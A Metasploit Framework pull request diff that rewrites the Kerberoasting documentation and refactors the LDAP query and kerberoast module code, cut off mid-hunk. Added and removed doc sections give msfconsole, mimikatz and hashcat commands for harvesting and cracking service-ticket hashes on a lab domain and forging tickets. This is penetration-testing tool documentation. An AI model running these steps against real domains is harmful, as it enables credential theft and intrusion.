### PR TITLE
Kerberoasting Improvements - Doc Update + Realm Fix

### DIFF
--- a/docs/metasploit-framework.wiki/kerberos/kerberoasting.md
+++ b/docs/metasploit-framework.wiki/kerberos/kerberoasting.md
@@ -37,367 +37,122 @@ cmd /c setspn -a %computername%/svc_kerberoastable.%userdnsdomain%:1337 %userdom
 
 ## Scenarios
 
-### Using get_user_spns
+Metasploit ships a native Kerberoasting module, `auxiliary/gather/kerberoast`, which does everything end-to-end without
+requiring Python, Impacket, Kiwi, or any other external tooling: it queries LDAP for kerberoastable accounts, requests
+TGS tickets from the KDC, and stores the resulting hashes in the Metasploit credentials database. Once the hashes are in
+the database, the `auxiliary/analyze/crack_windows` module can crack them in `hashcat` mode and write the recovered
+plaintext password back to the same credential record.
 
-The easiest way to enumerate Kerberoastable accounts is with the `auxiliary/gather/get_user_spns` module which internally leverages Impacket.
-This module will automatically query LDAP for Kerberoastable SPNs and request a Kerberos service ticket that may be encrypted using the weak password
-which can be bruteforced:
+The end-to-end flow is:
 
-```
-use auxiliary/gather/get_user_spns
-run rhost=192.168.123.13 user=<username> pass=<password> domain=<domain>
-```
+1. Run `auxiliary/gather/kerberoast` to enumerate kerberoastable SPNs and harvest the TGS hashes
+2. Run `auxiliary/analyze/crack_windows` in `hashcat` mode to recover the plaintext password from the harvested hashes
+3. View the cracked credentials with the `creds` command
 
-If you followed the lab setup setup above, this should output the following result:
+### Step 1: Harvest hashes with `auxiliary/gather/kerberoast`
 
-```msf
-msf auxiliary(gather/get_user_spns) > run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local
-
-[*] Running for 192.168.123.13...
-[+] ServicePrincipalName                    Name                MemberOf  PasswordLastSet             LastLogon  Delegation
-[+] --------------------------------------  ------------------  --------  --------------------------  ---------  ----------
-[+] DC3/svc_kerberoastable.ADF3.LOCAL:1337  svc_kerberoastable            2023-01-23 23:52:19.445592  <never>
-[+] $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1dcdcef4c926cb263abedf75ed$263fea3ad446bd6b4b8... etc etc ...
-```
-
-The final line contains the service ticket hash in a crackable format. Next paste this hash `$krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1..etc etc...` into a new file called `hash.txt`
-You can run Hashcat to crack the hash with a wordlist of choice, and see if the status of the hash has been marked as cracked:
+The `auxiliary/gather/kerberoast` module needs a set of valid domain credentials and the IP of a Domain Controller.
+By default the module will enumerate every kerberoastable account in the domain; if you want to target a single account
+(for example, the one created in the lab setup above) you can set the `TARGET_USER` option.
 
 ```
-$ hashcat -m 13100 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt
-... etc ...
-Session..........: hashcat
-Status...........: Cracked
-... etc ...
+msf > use auxiliary/gather/kerberoast
+msf auxiliary(gather/kerberoast) > run rhosts=192.168.123.13 ldapusername=Administrator ldappassword=p4$$w0rd ldapdomain=adf3.local target_user=svc_kerberoastable
 ```
 
-If the password has been cracked you can view the result at a later date with the above command and `--show` appended:
+A successful run looks like this:
 
 ```
-$ hashcat -m 13100 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
-$krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1dcdcef4c926cb...etc etc...:password123
-                                                                                                         ^ cracked password
+[*] Running module against 192.168.123.13
+[+] 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20260512120000_default_192.168.123.13_mit.kerberos.cca_123456.bin
+[+] 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20260512120000_default_192.168.123.13_mit.kerberos.cca_654321.bin
+[+] Success: $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$dc3/svc_kerberoastable.adf3.local~1337*$c2e73c1dcdcef4c926cb263abedf75ed$263fea3ad446bd6b4b8...
+[*] Auxiliary module execution completed
 ```
 
-Now that you have access to the password of the service account, you can use this to enumerate further in the AD environment.
-
-### Manual workflow
-
-An alternative to the easier `get_user_spns` module above is the more manual process of running the LDAP query module to
-find Kerberoastable accounts, requesting service tickets with Kiwi, converting the Kiwi ticket to a format usable by hashcat,
-and cracking the hash.
-
-1. Start msfconsole
-2. Obtain SPNs associated with user accounts from your target
-   1. Do: `use auxiliary/gather/ldap_query`
-   2. Do: `set action ENUM_USER_SPNS_KERBEROAST`
-   3. Run the module and note the discovered SPNs
-3. From your Meterpreter session:
-   1. Do: `load kiwi`
-   2. Do: Request a kerberos ticket for SPN found by the ldap_query module: `kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000`
-   3. Do: `kerberos_ticket_list`
-4. Export service tickets using the kiwi extension
-   1. Do: `kiwi_cmd kerberos::list /export`
-5. Crack the encrypted password in the service ticket using tgsrepcrack.py (more info on this python script below)
-   1. Do:  `python3 tgsrepcrack.py passlist.txt 1-40a10000-Administrator@HTTP\~testService-EXAMPLE.COM.kirbi`
-6. Rewrite the service tickets using kerberoast.py (more info on this python script below)
-   1. Do:  `python3  kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500`
-7. Finally inject the ticket back into RAM using Meterpreter's kiwi extension
-   1. `meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi`
-
-First an SPN needs to be found. This can be done in a number of ways - including using metasploit's
-very own `auxiliary/gather/ldap_query` module:
-
-```msf
-msf > use auxiliary/gather/ldap_query
-msf auxiliary(gather/ldap_query) > set RHOSTS 172.16.199.235
-RHOSTS => 172.16.199.235
-msf auxiliary(gather/ldap_query) > set BIND_DN DARWIN_CLAY
-BIND_DN => DARWIN_CLAY
-msf auxiliary(gather/ldap_query) > set BIND_PW N0tpassword!
-BIND_PW => N0tpassword!
-msf auxiliary(gather/ldap_query) > set action ENUM_USER_SPNS_KERBEROAST
-action => ENUM_USER_SPNS_KERBEROAST
-msf auxiliary(gather/ldap_query) > run
-[*] Running module against 172.16.199.235
-
-[+] Successfully bound to the LDAP server!
-[*] Discovering base DN automatically
-[*] 172.16.199.235:389 Getting root DSE
-dn:
-namingcontexts: DC=example,DC=com
-namingcontexts: CN=Configuration,DC=example,DC=com
-namingcontexts: CN=Schema,CN=Configuration,DC=example,DC=com
-
-...
-
-======================================================================
-
- Name                  Attributes
- ----                  ----------
- cn                    BERYL_SAVAGE
- samaccountname        BERYL_SAVAGE
- serviceprincipalname  CIFS/OGCWLPT1000000
-
-CN=CAITLIN_CAMPBELL OU=Devices OU=FIN OU=Tier 1 DC=example DC=com
-=================================================================
-
- Name                  Attributes
- ----                  ----------
- cn                    CAITLIN_CAMPBELL
- samaccountname        CAITLIN_CAMPBELL
- serviceprincipalname  ftp/BDEWSECS1000000
-
-CN=NETTIE_BURNS OU=ITS OU=Stage DC=example DC=com
-=================================================
-
- Name                  Attributes
- ----                  ----------
- cn                    ALBERTO_OLSEN
- samaccountname        ALBERTO_OLSEN
- serviceprincipalname  https/TSTWWKS1000002
-
-CN=LESSIE_PHILLIPS OU=Test OU=GOO OU=Stage DC=example DC=com
-============================================================
+The module stores the hash in the Metasploit database. If a domain account supports more than one Kerberos encryption
+type, the module will harvest a hash for each supported type (RC4, AES128, and AES256), each of which is stored as a
+separate credential record (`krb5tgs-rc4`, `krb5tgs-aes128`, `krb5tgs-aes256`). You can view the harvested hashes at any
+time with the `creds` command:
 
 ```
-
-Great, we now have a couple SPNs to move forward with.
-
-**Request Service Tickets - with kiwi**
-
-If you have a running Meterpreter session you can request a Service Ticket using the kiwi extension and one of the SPNs
-found above:
-
-```msf
-meterpreter > load kiwi
-Loading extension kiwi...
-
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000
-Asking for: https/TSTWLPT1000000
-   * Ticket Encryption Type & kvno not representative at screen
-
-	   Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM
-	   Service Name (02) : https ; TSTWLPT1000000 ; @ EXAMPLE.COM
-	   Target Name  (02) : https ; TSTWLPT1000000 ; @ EXAMPLE.COM
-	   Client Name  (01) : Administrator ; @ EXAMPLE.COM
-	   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
-	   Session Key       : 0x00000017 - rc4_hmac_nt
-	     07137dd7d5b801ef8b05c73380b18701
-	   Ticket            : 0x00000017 - rc4_hmac_nt       ; kvno = 0	[...]
-
+msf auxiliary(gather/kerberoast) > creds -t krb5tgs-rc4
 ```
 
-Tickets in the current session can be viewed like so:
-
-```msf
-meterpreter > kerberos_ticket_list
-[+] Kerberos tickets found in the current session.
-[00000000] - 0x00000012 - aes256_hmac
-   Start/End/MaxRenew: 12/16/2022 3:35:41 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM
-   Server Name       : krbtgt/EXAMPLE.COM @ EXAMPLE.COM
-   Client Name       : Administrator @ EXAMPLE.COM
-   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
-
-[00000001] - 0x00000017 - rc4_hmac_nt
-   Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM
-   Server Name       : https/TSTWLPT1000000 @ EXAMPLE.COM
-   Client Name       : Administrator @ EXAMPLE.COM
-   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
-```
-
-**Export Service Tickets**
-
-```msf
-meterpreter > kiwi_cmd kerberos::list /export
-
-[00000001] - 0x00000017 - rc4_hmac_nt
-   Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM
-   Server Name       : https/TSTWLPT1000000 @ EXAMPLE.COM
-   Client Name       : Administrator @ EXAMPLE.COM
-   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
-====================
-Base64 of file : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi
-====================
-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
-MDAwMA==
-====================
-
-   * Saved to file     : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi
-```
-
-**Crack Kiwi's Service Tickets**
-
-To crack the service ticket a number of tools can be used. In this example we'll use hashcat. First we need to convert
-the ticket we retrieved in the `.kirbi` format to a format parsable by hashcat. The script **kirbi2john** is part of
-[Tim Medin](https://twitter.com/TimMedin) [Kerberoast](https://github.com/nidem/kerberoast) toolkit is perfect for
-this task.
-
-First clone the repo then run the script against the `.kirbi` file.
+If you want a copy of the hash on disk - for example to feed to a standalone cracker - you can export it from the
+database in either hashcat or John the Ripper format using `creds -O` and the appropriate file extension:
 
 ```
-msfuser@ubuntu:~/git$ git clone https://github.com/nidem/kerberoast.git
-msfuser@ubuntu:~/git$ cd kerberoast
-msfuser@ubuntu:~/git/kerberoast$ python3 kirbi2john.py ~/1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi
-$krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140
-3a1808746b35d0e99159553e3c81a9cd32a51e968a4b45ce3fcf08e5eac8d4551df10c9f1bd4572cc273d1bd154fc8fd1228d55cd39a90b64ec3117f
-e0a1fb496d1be4042ccb2998d998fa3de8f50bcb04d3bf78e34be07d71310a3be829e24cb75c398847f960aefe9669534df26344beb6e7bbe628b7ac
-fa957c4a67417546fc441b84aaee78a0e5256cc9dead287327ac7907af71e02b142027c9061515c72ef03c842d0f73754f9dffa434a26057df4c4434
-71cd5bf76260469ea6f1c367a64ea02b01a2b9c2b83979911fc58fa8822c70877b72370078e3d7955fc2ade02acd2a803889a8c3a609f80f9beb45c0
-981aba6bdbb208fa6ea2cc91814c8c4dd6e9287f4ef3b9e2b7febe07648c78ec25137e82bee0d99290a33fd3701953bd858fac15c6d1652f11cc75a6
-e419cab7dec019e599eda3a76652475968bc2845fa6f02477efaecfd63e58fad817f1976adeda14b2c4c1508a84df1813e05368c3e07c9f656d5730d
-848b86c59bf576f4c2505375b7d6934abf8a955b1a71d802026383cbd9005bf12f0664ffc25ebee8aef4b574dd93850d59fc16c5f9881e9b4f957c33
-74724e4046c0fa4bc5ff16b9a960b4b6a2ede25bb18c617c2dbcfb3fd34a4cc3ee29fb0f6e6f43722ffc50ceddce55b2be1a53361d13c983980d3191
-86c7dbd124a3c8f19560e88d0d858b0f5320738931bf2f32c1e893fbbadb92f7574128f6f36a0acab99023f79d857f15f0920a1a76b3a97e6282d4e6
-c5ef30206444bc20da1a7d89d1007a97e75ffb9554cfeaf6757919a635dbdfcfd74d2eec8d5f83f109beb6e653a8c0e787ec039c7bb93d07a60e8bb4
-b56d026e809a80e020875a3a382b367f28c0e41714bd5ef97da578956cba12ab1fbcd84a5313d2edc5f7c601c3c56860a347ab013f50e3f8e6167935
-9db05e4014db38e21a814fe002ba14d17840aa053bbec3a6aadec31db50827168d24107486d373567c2969215c0decf639bc46b9968e43a79bc6f261
-2544feb09908118615035f630e37b03cb04d9725d2085a28543575d91c361bf1b6a61837d6c34c8961df33d1b8b45963bf361d33e0ca2fa37b40e62b
-6389ebb0ad4097036f4d6aa4598086313ea79d68f75301d5038783567c2fdcf25e2b459acdc867c64613fe84f3faf1fdb79fc6e05322b2175eec3b2e
-84e3a8165f0af265d3ccd994712704516f0c78f76dd7c5c98f8fc8b9db1231f19c259bc7f078a86d4bc6cf06b8c4158dc41f48dd51b146d3fc63d2fd
-f057e6644f838a944de0679ab3e8c6290d4d8004bd53570f61323eeb7c910c6546880a508172bf4ee2fa1c87748ec0e2e2f79e03e963affb593f1391
-a62fdf2f29b792b1c0e7ece2645381a4284b56ddc525c842589eca39efa0466418c9bfb60df479015f4fac86d38575aad1f29674a12d873f8fc12415
-b6ea7b2cb15c9d422f0f904a6af518f12c4e0e362093d8d33a47672973f6d70e80669666f37d6674ef8e2999c92fa38b5de8e266716bb182527bde17
-36bcb926a6340ae92f8b338be2fe5fa3a757894679beba5b296fe0cdc11100b9a536264cb5e3cb3c6d0426acaa7dd3928895d32973fab2698d17fff4
-f9f1ecd02102f5bbd222b039ca3e30fed4003be6b70b2e492c8ea5eee92439681d6af767547609a87d47b68ba7ca62dbe3e4bf74e081915ab15e4103
-8839b74263ddbd087c90b6262dd5684e078068c28ccc0c115e3
-tickets written: 1
+msf auxiliary(gather/kerberoast) > creds -t krb5tgs-rc4 -O 192.168.123.13 -o /tmp/krb5tgs.hcat
+[*] Wrote creds to /tmp/krb5tgs.hcat
 ```
 
-Copy the above hash to a file called hash.txt.
+For most workflows this manual export is unnecessary - the next step does it automatically.
 
-Ensure hashcat is installed: `msfuser@ubuntu:~/git/kerberoast$ sudo apt install hashcat`
+### Step 2: Crack the hash with `auxiliary/analyze/crack_windows`
 
-With a word list of your choice run the following command:
+Once the hashes are in the database, the `auxiliary/analyze/crack_windows` module will pull them out, hand them to
+hashcat or JtR, and write any cracked plaintext passwords back into the credential record. Support for the kerberoast
+hash types `krb5tgs-rc4`, `krb5tgs-aes128`, `krb5tgs-aes256`, `krb5asrep` and `timeroast` hashes was added in
+[PR #20881](https://github.com/rapid7/metasploit-framework/pull/20881).
 
-```
-msfuser@ubuntu:~/git/kerberoast$ hashcat -m 13100 --force -a 0 hash.txt wordlist.txt
-hashcat (v5.1.0) starting...
-
-OpenCL Platform #1: The pocl project
-====================================
-* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 16384/41063 MB allocatable, 6MCU
-
-Hashes: 1 digests; 1 unique digests, 1 unique salts
-Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
-Rules: 1
-
-Applicable optimizers:
-* Zero-Byte
-* Not-Iterated
-* Single-Hash
-* Single-Salt
-
-Minimum password length supported by kernel: 0
-Maximum password length supported by kernel: 256
-
-ATTENTION! Pure (unoptimized) OpenCL kernels selected.
-This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
-If you want to switch to optimized OpenCL kernels, append -O to your commandline.
-
-Watchdog: Hardware monitoring interface not found on your system.
-Watchdog: Temperature abort trigger disabled.
-
-* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64
- -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3
- -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll'
- 
-* Device #1: Kernel m13100_a0-pure.64a04b9e.kernel not found in cache! Building may take a while...
-Dictionary cache built:
-* Filename..: wordlist.txt
-* Passwords.: 3
-* Bytes.....: 33
-* Keyspace..: 3
-* Runtime...: 0 secs
-
-The wordlist or mask that you are using is too small.
-This means that hashcat cannot use the full parallel power of your device(s).
-Unless you supply more work, your cracking speed will drop.
-For tips on supplying more work, see: https://hashcat.net/faq/morework
-
-Approaching final keyspace - workload adjusted.
-
-$krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140
-<truncated due to size>
-
-Session..........: hashcat
-Status...........: Cracked
-Hash.Type........: Kerberos 5 TGS-REP etype 23
-Hash.Target......: $krb5tgs$23$*1-40a10000-Administrator@HTTP~testServ...c115e3
-Time.Started.....: Tue Jan 10 07:41:11 2023 (0 secs)
-Time.Estimated...: Tue Jan 10 07:41:11 2023 (0 secs)
-Guess.Base.......: File (wordlist.txt)
-Guess.Queue......: 1/1 (100.00%)
-Speed.#1.........:       26 H/s (0.03ms) @ Accel:32 Loops:1 Thr:64 Vec:8
-Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
-Progress.........: 3/3 (100.00%)
-Rejected.........: 0/3 (0.00%)
-Candidates.1.....: test123  -> N0tpassword!
-```
-
-If you want to view the hash + cracked password at a later date run the above command with `--show` appended.
+To kick off cracking, switch to the module, set `ACTION` to `hashcat`, and optionally point `CUSTOM_WORDLIST` at a
+wordlist of your choice:
 
 ```
-msfuser@ubuntu:~/git/kerberoast$ hashcat -m 13100 --force -a 0 hash.txt wordlist.txt --show
-$krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140
-<truncated due to size>
-39efa046757894679beba5b296fe0cdc11100b9a536264cb5e3cb3c6d0426acaa7dd3928895d32973fab2695476093ddbd087c115e3:N0tpassword!
+msf auxiliary(gather/kerberoast) > use auxiliary/analyze/crack_windows
+msf auxiliary(analyze/crack_windows) > set ACTION hashcat
+ACTION => hashcat
+msf auxiliary(analyze/crack_windows) > set CUSTOM_WORDLIST /usr/share/wordlists/rockyou.txt
+CUSTOM_WORDLIST => /usr/share/wordlists/rockyou.txt
+msf auxiliary(analyze/crack_windows) > run
 ```
 
-**Rewrite Service Tickets & RAM Injection**
-
-Kerberos tickets are signed with the NTLM hash of the password. If the ticket hash has been cracked then it is possible
-to rewrite the ticket with [Kerberoast](https://github.com/nidem/kerberoast) python script. This tactic will allow users
-to impersonate any domain user or a fake account when the service is going to be accessed. Additionally privilege
-escalation is also possible as the user can be added into an elevated group such as Domain Admins.
+When the module finishes you'll see a summary of any hashes that were cracked, along with the recovered plaintext
+password and the method used to crack them:
 
 ```
-➜  kerberoast git:(master) ✗ python3  kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type       Username            Cracked Password  Method
+ -----  ---------       --------            ----------------  ------
+ 121    krb5tgs-rc4     svc_kerberoastable  password123       Wordlist
+ 122    krb5tgs-aes128  svc_kerberoastable  password123       Already Cracked/POT
+ 123    krb5tgs-aes256  svc_kerberoastable  password123       Already Cracked/POT
 ```
 
-The new ticket can be injected back into the memory with the following Mimikatz command in order to perform
-authentication with the targeted service via Kerberos protocol.
+Subsequent runs of `crack_windows` against the same hash will be served out of hashcat's pot file and reported as
+`Already Cracked/POT`.
 
-```msf
-meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi
+### Step 3: View the recovered credentials
+
+Cracked passwords are stored back on the original credential record in the database, so a plain `creds` query against
+the target host will surface them:
+
 ```
+msf auxiliary(analyze/crack_windows) > creds 192.168.123.13
+```
+
+The cracked password can then be used like any other set of domain credentials - for example to authenticate to
+SMB, WMI, or LDAP, or as input to further Active Directory attack modules.
+
+### Notes on encryption types
+
+Most public kerberoasting tooling preferentially requests RC4-HMAC (etype 23) TGS tickets because RC4 hashes are
+considerably faster to crack on a GPU than AES. The `auxiliary/gather/kerberoast` module will request whichever
+encryption types the target account advertises support for, and `creds` will surface one record per encryption type.
+If only AES hashes are returned (because the domain has disabled RC4), cracking will be slower but the workflow is
+otherwise identical - `crack_windows` in `hashcat` mode handles all of `krb5tgs-rc4`, `krb5tgs-aes128`, and
+`krb5tgs-aes256`.
+
+### Manual / advanced workflow
+
+The `auxiliary/gather/kerberoast` module is the recommended entry point, but the building blocks remain available
+for users who want to drive the process by hand. The `auxiliary/gather/ldap_query` module with
+`ACTION ENUM_USER_SPNS_KERBEROAST` will list kerberoastable SPNs without requesting any tickets, which can be useful
+for reconnaissance before deciding which accounts to target. Hashes exported from the database with `creds -O` can be
+fed directly into a standalone hashcat or John the Ripper installation - use hash mode `13100` for RC4 (`krb5tgs-rc4`),
+`19600` for AES128 (`krb5tgs-aes128`), and `19700` for AES256 (`krb5tgs-aes256`).

--- a/lib/msf/core/exploit/remote/ldap/queries.rb
+++ b/lib/msf/core/exploit/remote/ldap/queries.rb
@@ -7,7 +7,7 @@ module Msf
   ###
   module Exploit::Remote::LDAP
     module Queries
-      def run_builtin_ldap_query(queryname)
+      def run_builtin_ldap_query(queryname, ldap: nil)
         missing_username = datastore['LDAPUsername'].blank?
         session_missing_or_wrong_type = (session.nil? || !session.is_a?(::Msf::Sessions::LDAP))
         bad_config = missing_username && session_missing_or_wrong_type
@@ -18,7 +18,7 @@ module Msf
         query = loaded_queries.select { |entry| entry['action'] == queryname }
         self.ldap_query = query[0]
         print_line
-        result_count = run_ldap_query(ldap_query['filter'], ldap_query['attributes']) do |result|
+        result_count = run_ldap_query(ldap_query['filter'], ldap_query['attributes'], ldap: ldap) do |result|
           yield result
         end
 
@@ -30,27 +30,35 @@ module Msf
         end
       end
 
-      def run_ldap_query(filter_string, attributes)
-        begin
-          ldap_connect do |ldap|
-            validate_bind_success!(ldap)
-            unless (base_dn = ldap.base_dn)
-              fail_with(Failure::UnexpectedReply, "Couldn't discover base DN!")
-            end
-
-            schema_dn = ldap.schema_dn
-            begin
-              filter = Net::LDAP::Filter.construct(filter_string)
-            rescue StandardError => e
-              fail_with(Msf::Module::Failure::BadConfig, "Could not compile the filter #{filter_string}. Error was #{e}")
-            end
-
-            result_count = perform_ldap_query_streaming(ldap, filter, attributes, base_dn, schema_dn) do |result, _attribute_properties|
-              yield result
-            end
+      def run_ldap_query(filter_string, attributes, ldap: nil, &block)
+        run_query = proc do |conn|
+          unless (base_dn = conn.base_dn)
+            fail_with(Failure::UnexpectedReply, "Couldn't discover base DN!")
           end
-        rescue Rex::ConnectionTimeout => e
-          fail_with(Msf::Module::Failure::Unreachable, "Could not connect. #{e}")
+
+          schema_dn = conn.schema_dn
+          begin
+            filter = Net::LDAP::Filter.construct(filter_string)
+          rescue StandardError => e
+            fail_with(Msf::Module::Failure::BadConfig, "Could not compile the filter #{filter_string}. Error was #{e}")
+          end
+
+          perform_ldap_query_streaming(conn, filter, attributes, base_dn, schema_dn) do |result, _attribute_properties|
+            block.call(result) if block
+          end
+        end
+
+        if ldap
+          run_query.call(ldap)
+        else
+          begin
+            ldap_connect do |conn|
+              validate_bind_success!(conn)
+              run_query.call(conn)
+            end
+          rescue Rex::ConnectionTimeout => e
+            fail_with(Msf::Module::Failure::Unreachable, "Could not connect. #{e}")
+          end
         end
       end
 

--- a/modules/auxiliary/gather/kerberoast.rb
+++ b/modules/auxiliary/gather/kerberoast.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Kerberos::Client
   include Msf::Exploit::Remote::LDAP
+  include Msf::Exploit::Remote::LDAP::ActiveDirectory
   include Msf::Exploit::Remote::LDAP::Queries
   include Msf::OptionalSession::LDAP
   include Msf::Exploit::Deprecated
@@ -57,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if datastore['TARGET_USER'].nil?
+    if datastore['TARGET_USER'].blank?
       run_ldap
     else
       run_user
@@ -85,24 +86,24 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_user
     verify_options
+
     user = datastore['TARGET_USER']
-    filter = "(&(objectClass=user)(sAMAccountName=#{Net::LDAP::Filter.escape(user)}))"
-    attributes = ['servicePrincipalName', 'sAMAccountName']
-    spn = nil
